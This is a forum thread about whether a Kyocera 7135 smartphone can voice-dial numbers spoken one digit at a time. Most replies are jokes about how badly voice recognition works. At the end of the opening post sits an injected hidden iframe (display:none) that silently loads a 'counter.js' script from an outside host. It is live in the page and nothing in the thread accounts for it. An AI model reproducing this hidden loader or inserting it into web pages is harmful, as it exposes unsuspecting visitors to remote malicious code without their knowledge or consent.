+ Reply to Thread

"Saying numbers" to dial out?

I know this was asked before, but I do not know if there was ever a definite answer. Is there a way to start the phone in voice recognition and then say something like "dial - 3 -4- 5-5-5-6-7" then have it dial that number? Is it possible in the future with the sdk? Thanks.<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

Well, if there are not any applications for this, then I suggest you try making a list of names in the address book - one name (the number) for each number. Then train the Kyocera to voice dial each one. Just possibly might work if you entered the numbers with a pause or break for the next number. Silly, huh.

Lot easier to do a search for Palm applications here and on Google. Or just ask a developer to write one.

I don't think any one has ever thought of this in the history of time, surely you get the prize!

There are no apps for this. The only thing is the voice dial services from the carrier.

jeh
    Yeah, I can just imagine... given the noisy circs in which this would be used:

"Four."
    "Did you mean to say - 'Four' ".
    "Yes."
    "Did you mean to say - 'Yes' ".
    "Yes."

By the seventh digit I think you'd be in a pretty bad mood.

Did you mean to say - 'Four'

SOOOOOOoooooo Funny!!!

Wonder how many have told their Kyo to go take a hike?

:smash :argue :dunno

:jump

LOL

I know how to make the 7135 SAY "Four" when you press 4 does that help
    iPhone therefore iAm.

Originally posted by Steve
    LOL

I know how to make the 7135 SAY "Four" when you press 4 does that help
    You smartphone hacker you.

y'know, it might help to know whether you're pressing the right numbers when you can't look at the keypad... that's a replacement for the lack of tactile feedback. is that what you use it for, or are you just having too much fun?

jeh
    > I know how to make the 7135 SAY "Four" when you
    > press 4 does that help

Since you asked.. no.

I had a nephew who used programmed his voicedial phone (Audiovox?) with two entries for each number. The first one was (for instance), "Steve", said in the normal deliberate voicedial tone of voice. The second one he would record practically screaming, adding GODDAMNIT!!! as a suffix. He usually just skipped right to the second entry the times I saw him using the phone.

Anyway, how does the voice recognition compare on the 7135? I haven't tried it, since with my previous devices, it has tended to be too annoying.

St

PS, I did this number trick with my first voice dial phone, years ago, and it worked great. Trouble was, I still had to find the send key and press it after I was finished--none of these devices I've seen are truly hands free, unfortunately.

Originally posted by KLiuLess
    You smartphone hacker you.

y'know, it might help to know whether you're pressing the right numbers when you can't look at the keypad... that's a replacement for the lack of tactile feedback. is that what you use it for, or are you just having too much fun?
    I'm having too much fun, but you bring up a good point
    iPhone therefore iAm.